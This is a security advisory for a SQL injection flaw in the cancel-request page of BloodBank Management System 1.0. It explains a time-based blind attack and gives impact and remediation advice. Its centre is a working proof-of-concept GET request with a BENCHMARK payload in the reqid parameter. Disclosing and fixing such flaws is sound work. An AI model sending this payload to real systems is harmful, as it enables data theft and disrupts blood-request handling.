- BloodBank Management System: 1.0
- Vulnerability Type: SQL Injection (Time-Based Blind)
- Severity: HIGH
- Status: Unpatched
/file/cancel.php?reqid=2
A SQL Injection vulnerability has been identified in the BloodBank Management System version 1.0, specifically in the cancel request functionality. This flaw arises from a lack of proper input sanitization on the reqid
parameter, enabling malicious users to inject SQL commands into the query handling cancellation requests.
The vulnerability allows for a time-based blind SQL injection attack. In this scenario, an attacker injects code that makes the system execute time-intensive SQL operations, such as using the BENCHMARK
function, to delay the response. If the request is valid, the system delays by a predefined amount of time, confirming that the injection worked. This technique can lead to:
- Exfiltration of sensitive data over time.
- Denial of Service (DoS) by slowing down the system.
- Tampering with blood request statuses, including unauthorized cancellations.
Below is an example of a GET request demonstrating the time-based blind SQL injection vulnerability:
GET /file/cancel.php?reqid=2'%20AND%202655%3dBENCHMARK(5000000%2cMD5(0x74466957))--%20pFWQ HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/sentrequest.php?msg=You%20have%20requested%20for%20blood%20group%20A-.%20Our%20team%20will%20contact%20you%20soon.
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive
In this PoC, the query includes a BENCHMARK
function that forces the system to perform 5,000,000 MD5 operations, resulting in a delayed response if the SQL query executes successfully. The response time confirms the injection vulnerability and demonstrates that the backend is susceptible to such attacks.
- Data Breach: Attackers could extract data from the database over time.
- Denial of Service (DoS): Multiple malicious requests could overload the server, reducing system availability.
- Unauthorized Cancellations: Attackers could cancel blood requests without proper authorization, disrupting critical processes.
- System Integrity Issues: Alterations in request records could cause confusion or operational failures in blood request management.
- Use Parameterized Queries: Replace dynamic queries with prepared statements to prevent SQL injection.
- Input Validation: Ensure that all input parameters, including
reqid
, are properly validated and sanitized. - Database Privileges: Limit the database user's permissions to minimize potential damage from an exploit.
- Error Handling: Avoid exposing detailed error messages that might aid attackers in crafting injections.
- Rate Limiting and Monitoring: Monitor requests and apply rate limits to prevent denial-of-service attacks.
- Security Testing: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities early.